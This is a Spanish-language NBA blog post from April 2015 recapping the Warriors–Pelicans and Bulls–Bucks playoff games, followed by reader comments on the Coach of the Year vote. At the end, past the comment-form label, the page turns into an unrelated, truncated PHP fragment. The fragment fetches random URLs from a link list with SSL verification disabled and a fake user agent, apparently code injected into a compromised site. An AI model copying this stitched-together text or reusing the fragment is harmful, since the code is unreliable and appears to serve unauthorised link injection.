La Crónica: Sin sorpresas

21 de April de 2015 por txusma

Avanzan los playoffs y lo hacen sin demasiadas emociones más allá de las propias de los partidos.  A excepción de los Raptors, que hoy intentarán hacer valer el factor cancha ante unos rivales parejos como los Wizards, todos los locales cuentan sus partidos por victorias. Warriors y Bulls pusieron anoche el 2-0 y dejan las eliminatorias encaradas para resolverlas a la vuelta o incluso a domicilio aunque si algo demostraron ayer Pelicans y Bucks es que no están a dispuestos a ser barridos.

New Orleans Pelicans 87 – Golden State Warriors 97

Los aficionados del Oracle Arena dieron la bienvenida a Monty Williams y los Pelicans gritando aún más fuerte. El entrenador de New Orleans había declarado que el nivel de decibelios del pabellón era tan alto que podía ser incluso ilegal y la marea amarilla le recordó que son capaces de mejorar su propia marca. De todas maneras, lejos de amilanarse, Anthony Davis (26p, 10r, 2rb, 2t), Eric Gordon (23p) y los suyos salieron enchufadísimos y llegaron a alcanzar una diferencia de 13 puntos en el primer cuarto que enmudeció momentáneamente el Oracle Arena. Poco duró el espejismo. En el segundo cuarto Stephen Curry (22p, 6a), Klay Thompson (26p) y Draymond Green (14p, 12r, 5a, 3rb), con la ayuda del veterano Leandro Barbosa (12p) pusieron las cosas en su sitio y los locales se fueron 3 arriba al descanso. En la reanudación una buena defensa mantuvo a raya a unos Pelicans que jugaron con mucha más pasión que el primer partido. Tyreke Evans, por ejemplo, jugó lesionado pero aún así fue capaz de acabar con 16 puntos, 10 rebotes y 7 asistencias. En el último cuarto, 14 puntos de Klay Thompson y un mayor acierto en los momentos claves amarraron la victoria para los locales.

Milwaukee Bucks 82 – Chicago Bulls 91

Jimmy Butler acabó el primer partido de la serie con su récord de anotación en un partido de playoffs tras anotar 25 puntos. Ayer se fue a los 31 y a fe cierta que cada uno de ellos fue clave para que los Bulls acabaron imponiéndose en un partido que no pintaba del todo bien durante la primera parte. Derrick Rose (15p, 7r, 9a) falló sus 6 primeros lanzamientos a canasta y no fue capaz de anotar en los 2 primeros periodos. Por suerte, Nikola Mirotic (8p, 4r) y el propio Jimmy Butler estuvieron más acertados en el segundo cuarto y pusieron a los suyos uno arriba al descanso. El marcador (39-38) reflejaba la falta de aciertos de ambos conjuntos. En el tercer cuarto Rose y Pau Gasol (11p, 16r, 4t) se pusieron las pilas pero los Bucks, de la mano de un gran Kris Middleton (22p, 6r) se las arreglaron para llegar por delante a los últimos 10 minutos de partido. En ese preciso momento entró en combustión Jimmy Butler que anotó 14 puntos con un 3 de 3 en triples y protaganizó prácticamente en solitario un parcial de 13-0 que dio la vuelta al marcador y cerró el partido. Joakim Noah con 19 rebotes también fue de los destacados por los locales.

Y esta noche…

A la 1:00 AM los Celtics intentarán asaltar el Quicken Loans Arena de Cleveland algo que se antoja harto complicado una vez visto el primer partido de la serie. Más igualado se presenta el Raptors-Wizards de las 2:AM aunque servidor pronóstica fácil victoria local por relajación de los capitalinos que seguramente saltarán a la pista con la sensación de ya haber cumplido en Canadá. De todas maneras, el plato fuerte de la jornada es el Mavericks-Houston que se juega a las 3:30AM. Veremos si James Harden continún involucrando a sus compañeros en las facetas anotadoras o asume él mismo el papel. De cualquier forma, Dallas ha de encontrar la manera no de pararlo, que es algo casi imposible, sinó de minimizar su impacto lo máximo posible.

Comenta

5 comentarios a esta entrada

  1. GreenPride dice:
    #1

    Bueno pues efectivamente de momento pocas sorpresas.
    Los dos favoritos en estas series encaran el pase pero la verdad es que sudaron mucho para hacerlo.
    En Chicago los Bucks a base de defensa ponen en problemas a los Bulls. Tras el muy buen primer partido Rose volvió a hacer un partido más que discreto y sus Bulls sufrieron mucho. Además no parecen demasiado interesados en hacer que Pau juegue al poste y no le dan muchos balones lo que creo que es un gran error. De momento, la actuación de Butler y las propias limitaciones de los Bucks en ataque les van salvando pero yo sigo sin verles del todo finos. Al menos están todos sanos…
    En Oackland, los Warriors tuvieron que remar a remolque de unos grandes Pelicans durante casi 3 cuartos y llegaron a los minutos finales muy igualados. Una vez allí el acierto de Klay Thompson y su defensa ante el cansancio de Evans y Davis les dieron una ventaja definitiva. Los Pelicans están haciendo bastante buen papel y los Warriors deben todavía afinar más si quieren despachar rápido la eliminatoria.

      Citar

  2. Ruxixón dice:
    #2

    Se notó muchísimo el cansancio en el último cuarto de los Pelicans,ahí si que se está notando la dosificación de esfuerzos y la fatiga mental que arrastran unos y otros de este final de Regular Season.No obstante,lo de NOLA es admirable.Tienen un partido clave ahora en New Orleans,o ganan ese o creo que habrá barrida.A ver si por allí dan el do de pecho a nivel ambiente,que supongo que Monty Williams también habrá hecho esas declaraciones del Oracle esperando que su gente iguale el tema.

      Citar

  3. Ruxixón dice:
    #3

    Budenholzer CoY,con 513 puntos.Kerr acaba 2º con 471.Les siguen Kidd (se quita la espina de los Nets un año después),Stevens (haciéndose hueco entre la élite,¿futuro ganador del premio?) y Pop.

      Citar

  4. Azabel dice:
    #4

    Ruxixón:
    Budenholzer CoY,con 513 puntos.Kerr acaba 2º con 471.Les siguen Kidd (se quita la espina de los Nets un año después),Stevens (haciéndose hueco entre la élite,¿futuro ganador del premio?) y Pop.

    inmerecido, Kerr mejoro algo a los warriors, pero estos ya eran un equipo fuerte y muy joven del cual no quedaban dudas de que fueran a mejorar con un año mas de experiencia

    lo de Budenholzer muy meritorio y merecido, creo que Kidd merecia mas reconocimiento, tomo uno de los peores equipos de la NBA, y con el mismo plantel (un par de juegos de parker) o menos (sanders) y sufriendo la baja de Knight los transformo durante todo el curso en un equipo de PO y termino clasificando comodamente, supo explotar y sacar el jugo a lo poco que tenia como ninguno

    nadie daba nada por los Bucks, y si no hubiesen traspasado a Knight, querria ver a los Bulls como se las apañaban en esta serie contra ellos

      Citar

  5. Nacho dice:
    #5

    Joerger también podía estar por ahí.
    Hombre Azabel, que Kerr sea segundo tampoco es tan inmerecido. Que GSW iban a mejorar se podía saber, pero de esa manera, y con ese espectáculo ya no tanto.
    Creo que es una lista bastante lógica.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>